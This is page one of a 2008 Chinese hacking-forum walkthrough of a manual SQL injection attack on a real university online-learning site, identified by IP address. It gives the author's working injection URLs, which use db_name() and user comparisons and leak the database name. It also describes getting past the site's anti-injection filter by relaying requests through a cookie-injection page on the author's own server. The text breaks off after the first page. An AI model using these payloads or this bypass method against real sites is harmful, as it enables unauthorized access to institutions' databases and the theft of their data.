| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 | 
服务导航 我要发布 主力频道 空间域名 精华收集 服务器出租 黑客培训 光盘刻录 特色服务 解决方案 我要投诉
您现在的位置: 华夏黑客同盟 >> Hack >> 脚本漏洞攻击 >> 正文 用户登录 新用户注册
[组图]手工注入电科大网络学堂         ★★★ 【字体:
拿电子科大网络学堂手工注入
作者:不详 文章来源:华盟收集 点击数: 更新时间:2008-6-4

  很多朋友都说我拿站就只有图,现在写一个简单的过程!

  没什么技术含量,别见笑!呵呵,开始了,1.先判断是否存在注入:在地址后面打上'

  http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'

                  

  有防注入系统,限制了我的IP,现在就可以用COOKIES注入

  进入注入:

                  

  填写相应信息,生成1.asp,放到我服务器上次,地址是:http://www.xuyunfeng.com.cn/1.asp

  加上参数为:http://www.xuyunfeng.com.cn/1.asp?xuyunfeng=0048

  现在尝试注入;http://www.xuyunfeng.com.cn/1.asp?xuyunfeng=0048'

                  

  提示出错,试了一下不能注入,到了这里一般的朋友都放弃了,现在我们回到原来的注入点

  http://218.6.168.52/wlxt/listcourse.asp?courseid=0048一:暴数据库信息:

  1.判断数据库名:

  http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20and%20db_name()>0%20and%20''='

                  

  暴出数据库名为:wlxt

  2.判断数据库用户名:

  http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20and%20user>0%20and%20''='

                 

[1] [2] [3] 下一页

责任编辑:朱倩  联系方式  Email:朱倩
电话:51228163
  • 上一篇黑客:

  • 下一篇黑客:
    • (只显示最新5条。评论内容只代表网友观点,与本站立场无关!)
    姓 名:
    		 * 游客填写  ·注册用户
    主 页:
    评 分:
    		 1分 2分 3分 4分 5分
    评论内容:
    验证码: *
  • 请遵守《互联网电子公告服务管理规定》及中华人民共和国其他各项有关法律法规。
  • 严禁发表危害国家安全、损害国家利益、破坏民族团结、破坏国家宗教政策、破坏社会稳定、侮辱、诽谤、教唆、淫秽等内容的评论 。
  • 用户需对自己在使用本站服务过程中的行为承担法律责任(直接或间接导致的)。
  • 本站管理员有权保留或删除评论内容。
  • 评论内容只代表网友个人观点,与本网站立场无关。
    • 最新hack更新
    最新推荐资讯
    相关黑客
    EditPlus查找注入表达式
    破解SQL自动注入猜解机
    Asp.net注入台湾站
    我常用的一些注入命令
    对快递公司一次艰难注入
    informix的注入整理
    角色注入直接获系统权限
    注入必备:Cookie与联合查询
    注入的限制绕过
    批处理也玩注入
    最新会员软件
    最新推荐视频
    最新推荐动画

    Copyright @ 2005 77169.Net Inc. All rights reserved. 华夏黑客同盟 版权所有
    北京市电信通提供网络带宽

    mailto:webmaster@77169.net
    咨询QQ号:836982 / 59280880
    联系站长 QQ38588913
    热线电话: 86-10-67634029/676229433
    京ICP证041431号